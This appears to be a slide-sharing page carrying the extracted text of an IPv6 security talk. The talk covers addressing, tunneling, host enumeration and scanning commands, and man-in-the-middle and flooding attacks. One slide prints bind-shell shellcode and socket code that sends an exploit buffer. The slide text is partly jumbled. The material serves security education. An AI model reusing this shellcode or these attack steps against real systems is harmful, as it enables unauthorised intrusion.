The End of IPv4: What It Means for Incident RespondersThe End of IPv4: What It Means for Incident Responders
The End of IPv4: What It Means for Incident Responders
 
dokumen.tips_linux-networking-commands.ppt
dokumen.tips_linux-networking-commands.pptdokumen.tips_linux-networking-commands.ppt
dokumen.tips_linux-networking-commands.ppt
 
IPv6 The Big Move
IPv6 The Big MoveIPv6 The Big Move
IPv6 The Big Move
 
fgont-h2hc-2020-ipv6-security.pdf
fgont-h2hc-2020-ipv6-security.pdffgont-h2hc-2020-ipv6-security.pdf
fgont-h2hc-2020-ipv6-security.pdf
 
NAT 64 FPGA Implementation
NAT 64 FPGA ImplementationNAT 64 FPGA Implementation
NAT 64 FPGA Implementation
 
v6_whats-happening (presentation at GEANT APM meeting, 2011, Ljubljana)
v6_whats-happening (presentation at GEANT APM meeting, 2011, Ljubljana)v6_whats-happening (presentation at GEANT APM meeting, 2011, Ljubljana)
v6_whats-happening (presentation at GEANT APM meeting, 2011, Ljubljana)
 
Tech f42
Tech f42Tech f42
Tech f42
 
Multi-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesMulti-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation Strategies
 
4. IPv6 Security - Workshop mit Live Demo - Marco Senn Fortinet
4. IPv6 Security - Workshop mit Live Demo - Marco Senn Fortinet4. IPv6 Security - Workshop mit Live Demo - Marco Senn Fortinet
4. IPv6 Security - Workshop mit Live Demo - Marco Senn Fortinet
 
IPv6 Security - Workshop mit Live Demo
IPv6 Security - Workshop mit Live DemoIPv6 Security - Workshop mit Live Demo
IPv6 Security - Workshop mit Live Demo
 
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThe Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
 

Mehr von Don Anto

Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceDon Anto
 
Network & Computer Forensic
Network & Computer Forensic Network & Computer Forensic
Network & Computer Forensic Don Anto
 
BGP Vulnerability
BGP VulnerabilityBGP Vulnerability
BGP VulnerabilityDon Anto
 
Web & Wireless Hacking
Web & Wireless HackingWeb & Wireless Hacking
Web & Wireless HackingDon Anto
 
Spying The Wire
Spying The WireSpying The Wire
Spying The WireDon Anto
 
Distributed Cracking
Distributed CrackingDistributed Cracking
Distributed CrackingDon Anto
 
Deep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking PhilosopyDeep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking PhilosopyDon Anto
 

Mehr von Don Anto (7)

Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in Cyberspace
 
Network & Computer Forensic
Network & Computer Forensic Network & Computer Forensic
Network & Computer Forensic
 
BGP Vulnerability
BGP VulnerabilityBGP Vulnerability
BGP Vulnerability
 
Web & Wireless Hacking
Web & Wireless HackingWeb & Wireless Hacking
Web & Wireless Hacking
 
Spying The Wire
Spying The WireSpying The Wire
Spying The Wire
 
Distributed Cracking
Distributed CrackingDistributed Cracking
Distributed Cracking
 
Deep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking PhilosopyDeep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking Philosopy
 

IPv6 Fundamentals & Securities

  • 1. IPv6 Fundamentals & Securities Don Anto IPSECS.COM
  • 2. Who? • Don Anto • Information security manager • JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF • A dead security researcher • Involve in security field for almost 10 years • Genius evil thinker; professional troublemaker • @djantoxz
  • 3. IPv6 - Why? • Analog to digital convergence (E.G: Voice over IP) • The use of virtualization (E.G: Cloud) • Embedded devices (Smart phone, RFID) networking • All increase the needs of unique IP Address • So, more IP Address spaces are required! • Finally, IPv4 Address Exhaustion
  • 4. IPv6 - What? • The latest version of Internet Protocol (IP), and is intended to replace IPv4 • 128 bit IP Addressing, instead of 32 bit, to multiply IP address space • IPv4 = 232 (4.294.967.296) >< IPv6 2128 (3.4×1038) • Not using dot decimal anymore, otherwise hexadecimal with colon is used • E.G: • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 • 2001:470:0:64::2 • fe80::1
  • 5. IPv6 Fundamentals Source: Fernando Gont Presentation • IPv6 header, 40 Bytes Fixed Length • Source address 16 bytes, destination address 16 bytes • 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit
  • 6. IPv6 Fundamentals • IPv6 Address Type: • Loopback • Unspecified • Multicast • Anycast • Local unicast • Global unicast • Subneting • Routing Source: Fernando Gont Presentation
  • 7. v4 >< v6 Source: Fernando Gont Presentation
  • 8. v4 to v6 • Dual-Stack system to support IPv4 & IPv6 concurrently • Tunneling mechanism to encapsulate IPv6 inside IPv4 • 6to4, 6in4, Teredo, ISATAP • Network Address Translation (NAT) • Network Address Translation – Protocol Translation (NAT-PT) • Network Address Translation – IPv6 IPv4 (NAT-64) • Free IPv6 Tunnel Broker?
  • 9. Security Issues • Large space of IPv6 address (enumeration, scanning, managing) • The use of tunneling? The use of dual-stack networking? • Weakness in IPv6 itself? (protocol level vulnerabilities) • Weakness of Application ran on IPv6
  • 10. Enumeration • Discovery through multicast address (FF02::1) ipv6lab ->./alive6 eth4 • Discovery through ICMPv6 Echo Request Alive: dead:beaf::3 • Discovery through DNS Query (A >< AAAA) Alive: dead:beaf::1 • Discovery through SNMP Query Found 2 systems alive • Google helps us to find IPv6 domains • The presence of IPAM may be help ipv6lab->host -t A www.jp.freebsd.org www.jp.freebsd.org has address 119.245.129.228 ipv6lab->host -t AAAA www.jp.freebsd.org www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 ipv6lab->ping6 -I eth4 ff02::1 PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes 64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms 64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!) 64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!) ipv6lab->ip -6 neigh show fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
  • 11. ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on dead:beaf::3: Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) Scanning ipv6lab->nmap -sV -PN -T4 192.168.137.103 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on 192.168.137.103: Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems) v4 to v6 proxy is usually helpful E.G: Socat apt-get install socat • Port Scanning (Tools with IPv6 support) • Vulnerability Scanning (Tools with IPv6 support)
  • 12. Perimeter Defense Bypass • Does Firewall protect both IPv4 and IPv6 network? • Does IDS/IPS protect both IPv4 and IPv6 network? • TEREDO tunneling can be used to bypass NAT and to compromise internal network • The use of dual stack and tunneling mandates the protection for IPv4 and IPv6
  • 13. Perimeter Defense Bypass • IPv4 is well governed by firewall using NAT or policies • Poor firewall configuration is potentially used to bypass access using IPv6 network to DMZ • Even worse, someone may directly access the internal network from internet
  • 14. Exploiting - Protocols • IPv6 also designed to increase security of IPv4, unfortunately there is no significant improvement • Some problems in IPv4 is still persistent in IPv6 • Man In The Middle Attack • Denial of Services Attack • More and more 
  • 15. Man In The Middle • Spoofed ICMP Neighbor Advertisement (replacing ARP in v4) • Spoofed ICMP Router Advertisement • Spoofed ICMP Redirect or ICMP Toobig to implant routing • Rogue DHCPv6 Server (replacing DHCP server in v4) • More and more  Source Image: OWASP website Used to help packet sniffing
  • 16. Denial of Services anto# ifstat -b eth0 • Traffic flooding with ICMPv6 RA, NA, NS, MLD, Smurfing Kbps in Kbps out 9851.48 1.08 • Prevent new IPv6 address with DAD 10244.34 0.95 • CPU Exhaustion with ICMPv6 NS and a lot of crypto stuff 10313.33 0.95 • Routing loop attack utilizes automatic tunneling 9165.56 0.95 • ICMP attack against TCP to tear down BGP session 9358.11 0.95 10165.01 0.95 9802.98 0.95 9353.34 0.95 anto# tcpdump -n -i eth0 dst host dead:beaf::3 20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 4700 packets captured 4884 packets received by filter 93 packets dropped by kernel
  • 17. Exploiting - Apps char shellcode[] = /*Portbind @ 4444*/ "xd9xccxbdx59x34x55x97xd9x74x24xf4x5ax29xc9" • Buffer Overflow "xb1x17x31x6ax19x83xc2x04x03x6ax15xbbxc1x64" "x4cx68x69xd4x18x84xe4x3bxb6xfexaex76xc7x68" • Remote Format String "xd7xdbx9axc6xbax89x48x80x52x3fx31x2axcbx35" • Off-By-One "xc9x3bxeax20xd5x6axbbx3dx04xcfx29x58x9fx02" • Web App Attacks "x2dx14x79x2fx2ax98x06x1dx61x74x8ex40xc6xc8" • More Attacks?! "xf6x4fx49xbbxaex25x75xe4x9dx39xc0x6dxe6x51" "xfcxa2x65xc9x6ax92xebx60x05x65x08x22x8axfc" • There’s no big difference "x2ex72x27x32x30"; • Socket programming & shellcodes for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){ if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){ v4 to v6 proxy is usually printf("can't create socketn"); exit(0); helpful E.G: Socat } apt-get install socat connect(s,AI->ai_addr,AI->ai_addrlen); send(s,buffer,len,0); printf("Check your shell on %s TCP port 4444n",argv[1]); }
  • 18. DEMO